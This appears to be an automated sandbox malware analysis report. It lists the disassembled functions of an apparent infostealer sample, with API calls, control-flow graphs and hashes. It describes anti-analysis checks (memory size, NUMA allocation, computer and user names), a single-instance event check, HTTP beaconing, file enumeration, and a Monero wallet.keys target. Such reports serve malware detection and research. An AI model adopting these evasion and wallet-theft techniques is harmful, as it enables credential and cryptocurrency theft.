                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                          • String ID:
                          • API String ID: 2525456742-0
                          • Opcode ID: 5b4e27818a69aa005a35e791c877479305493ca5731c881276e699cbdef3d54d
                          • Instruction ID: 0a1bc0551e240922864c0483e7bac509a0741df9ddf694739a3975680913dea2
                          • Opcode Fuzzy Hash: 5b4e27818a69aa005a35e791c877479305493ca5731c881276e699cbdef3d54d
                          • Instruction Fuzzy Hash: 33311AB0A0020CAADB14FBE4D856BFE7738EF04340F558528F746A6585DFB46A05CBB6
                          Function 00DE1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1436 de1220-de1247 call df89b0 GlobalMemoryStatusEx 1439 de1249-de1271 call dfda00 * 2 1436->1439 1440 de1273-de127a 1436->1440 1442 de1281-de1285 1439->1442 1440->1442 1444 de129a-de129d 1442->1444 1445 de1287 1442->1445 1447 de1289-de1290 1445->1447 1448 de1292-de1294 ExitProcess 1445->1448 1447->1444 1447->1448
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00DE123E
                          • __aulldiv.LIBCMT ref: 00DE1258
                          • __aulldiv.LIBCMT ref: 00DE1266
                          • ExitProcess.KERNEL32 ref: 00DE1294
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 3404098578-2766056989
                          • Opcode ID: 7429e0d3aa74132e123e3a07f82effc272f9099ac3c898946abd461a3c0efebc
                          • Instruction ID: 52d2796ee8b1e690762d989eaecef1d1e16b0a8596825505437dc55bbd92c06a
                          • Opcode Fuzzy Hash: 7429e0d3aa74132e123e3a07f82effc272f9099ac3c898946abd461a3c0efebc
                          • Instruction Fuzzy Hash: 4E014FB4A40348EADB10EBD5CC4ABADB778EB14701F248044E705B6180D6745545876D
                          Function 00DF6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1450 df6af3 1451 df6b0a 1450->1451 1453 df6b0c-df6b22 call df6920 call df5b10 CloseHandle ExitProcess 1451->1453 1454 df6aba-df6ad7 call dfaad0 OpenEventA 1451->1454 1460 df6ad9-df6af1 call dfaad0 CreateEventA 1454->1460 1461 df6af5-df6b04 CloseHandle Sleep 1454->1461 1460->1453 1461->1451
                          APIs
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00838AE8,?,00E0110C,?,00000000,?,00E01110,?,00000000,00E00AEF), ref: 00DF6ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00DF6AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00DF6AF9
                          • Sleep.KERNEL32(00001770), ref: 00DF6B04
                          • CloseHandle.KERNEL32(?,00000000,?,00838AE8,?,00E0110C,?,00000000,?,00E01110,?,00000000,00E00AEF), ref: 00DF6B1A
                          • ExitProcess.KERNEL32 ref: 00DF6B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                          • String ID:
                          • API String ID: 941982115-0
                          • Opcode ID: 156f17488948e83f23429fa38d0a442716a49feed983da466a42606560be1e4e
                          • Instruction ID: 3e0108aea8969ebf7f9e2e3e0620b6b33698e1c4fecdb1dcbe119ef16b602b5b
                          • Opcode Fuzzy Hash: 156f17488948e83f23429fa38d0a442716a49feed983da466a42606560be1e4e
                          • Instruction Fuzzy Hash: 2BF03A70A4020DEEE720AFA09C0ABBD7A34FB04701F25C514FB47A2985CBB59540DA75
                          Function 00DE47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DE4839
                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00DE4849
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1274457161-4251816714
                          • Opcode ID: 4e6857663d23f0b1863d7b0a59ee550d48216493039778df99bb7e876f298d99
                          • Instruction ID: 8a7c87730667829017bdf67b6e8d1e08c9453ee098f0a24014299e99f53cf263
                          • Opcode Fuzzy Hash: 4e6857663d23f0b1863d7b0a59ee550d48216493039778df99bb7e876f298d99
                          • Instruction Fuzzy Hash: 6D211FB1D00209ABDF14DFA4E845AEE7B75FF45320F108625FA55A72C0EB746A09CF91
                          Function 00DF51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                            • Part of subcall function 00DE6280: InternetOpenA.WININET(00E00DFE,00000001,00000000,00000000,00000000), ref: 00DE62E1
                            • Part of subcall function 00DE6280: StrCmpCA.SHLWAPI(?,00840B30), ref: 00DE6303
                            • Part of subcall function 00DE6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DE6335
                            • Part of subcall function 00DE6280: HttpOpenRequestA.WININET(00000000,GET,?,00840030,00000000,00000000,00400100,00000000), ref: 00DE6385
                            • Part of subcall function 00DE6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00DE63BF
                            • Part of subcall function 00DE6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DE63D1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DF5228
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                          • String ID: ERROR$ERROR
                          • API String ID: 3287882509-2579291623
                          • Opcode ID: 11fa6535237faafe645e9c73abaf81ddd6c0f5b547c04f95f826be6b58b38728
                          • Instruction ID: 8299f482215c091760ec78914c1c55964bc9f5ce4960a9e24ec80778791d32ef
                          • Opcode Fuzzy Hash: 11fa6535237faafe645e9c73abaf81ddd6c0f5b547c04f95f826be6b58b38728
                          • Instruction Fuzzy Hash: 69110AB090014CAACB14FF68D952AFD7338EF50340F41C158FA0E5A596EF70AB0AC6B1
                          Function 00DE1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00DE112B
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00DE1132
                          • ExitProcess.KERNEL32 ref: 00DE1143
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: 006a2a3027303f024b81575af62aff2fd5a91c2432c521e7297b1fec1faacdde
                          • Instruction ID: cd3d264b999ae83080c3c26c25ed3f10978f10a5358405ae3fa051df80d7cb73
                          • Opcode Fuzzy Hash: 006a2a3027303f024b81575af62aff2fd5a91c2432c521e7297b1fec1faacdde
                          • Instruction Fuzzy Hash: 95E0E674B45348FFE7306FA19C0AB0D7678EB04B01F204055F709B75C4DAF9264097A9
                          Function 00DE10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00DE10B3
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00DE10F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 5effc5ef2d8bbc05047399315e778d4869b560db53a6114a07da9b2c871f80d4
                          • Instruction ID: c377df6434874f4081a25bf0665ab8614473a71cd170f93be9ddc10e015e77fc
                          • Opcode Fuzzy Hash: 5effc5ef2d8bbc05047399315e778d4869b560db53a6114a07da9b2c871f80d4
                          • Instruction Fuzzy Hash: E0F0E971741208BBE7249AA49C49FBAB7DCE705B15F300444F544E3280D5729E00DB64
                          Function 00DE1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF7910
                            • Part of subcall function 00DF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00DF7917
                            • Part of subcall function 00DF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00DF792F
                            • Part of subcall function 00DF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00DE11B7), ref: 00DF7880
                            • Part of subcall function 00DF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00DF7887
                            • Part of subcall function 00DF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00DF789F
                          • ExitProcess.KERNEL32 ref: 00DE11C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                          • String ID:
                          • API String ID: 3550813701-0
                          • Opcode ID: f4b92cb80c78a9f42a3a7001d3d8dfc495f5c6880c0a0199eb9a235b1b1d7d63
                          • Instruction ID: ab1d251a089515670c8e74e2fca8508880186640dc2458443640521f24c8d3ba
                          • Opcode Fuzzy Hash: f4b92cb80c78a9f42a3a7001d3d8dfc495f5c6880c0a0199eb9a235b1b1d7d63
                          • Instruction Fuzzy Hash: 14E012B5B1430997CF347BB1AC0AB3A329CDB14385F194424FB09D3602FE2AE8509679

                          Non-executed Functions

                          Function 00DF38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00DF38CC
                          • FindFirstFileA.KERNEL32(?,?), ref: 00DF38E3
                          • lstrcat.KERNEL32(?,?), ref: 00DF3935
                          • StrCmpCA.SHLWAPI(?,00E00F70), ref: 00DF3947
                          • StrCmpCA.SHLWAPI(?,00E00F74), ref: 00DF395D
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00DF3C67
                          • FindClose.KERNEL32(000000FF), ref: 00DF3C7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 1125553467-2524465048
                          • Opcode ID: f1e6290e2fc369efdad92a24caa63f84ba2f40b313b55d29c4bfeb48040d8186
                          • Instruction ID: f92c9dc85cb33f9e1e48e1dbe2828f98cd93b49ed44fa7524a8fd676ee7182f6
                          • Opcode Fuzzy Hash: f1e6290e2fc369efdad92a24caa63f84ba2f40b313b55d29c4bfeb48040d8186
                          • Instruction Fuzzy Hash: 21A12DB1A00219ABDB34EF64DC85FFA7378FB48300F058588E64E96545EB759B84CF62
                          Function 00DEBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                          • FindFirstFileA.KERNEL32(00000000,?,00E00B32,00E00B2B,00000000,?,?,?,00E013F4,00E00B2A), ref: 00DEBEF5
                          • StrCmpCA.SHLWAPI(?,00E013F8), ref: 00DEBF4D
                          • StrCmpCA.SHLWAPI(?,00E013FC), ref: 00DEBF63
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00DEC7BF
                          • FindClose.KERNEL32(000000FF), ref: 00DEC7D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
